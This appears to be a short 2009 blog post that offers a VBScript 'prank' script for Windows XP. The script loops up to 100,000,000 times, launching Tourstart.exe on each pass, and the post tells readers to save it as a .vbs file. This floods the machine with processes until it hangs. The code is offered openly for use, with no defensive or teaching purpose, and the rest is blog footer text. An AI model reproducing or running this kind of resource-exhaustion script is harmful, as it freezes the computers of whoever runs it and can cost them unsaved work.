Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Save It As Anything.vbsIt Only Works With Windows XP
Monday, June 22, 2009
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment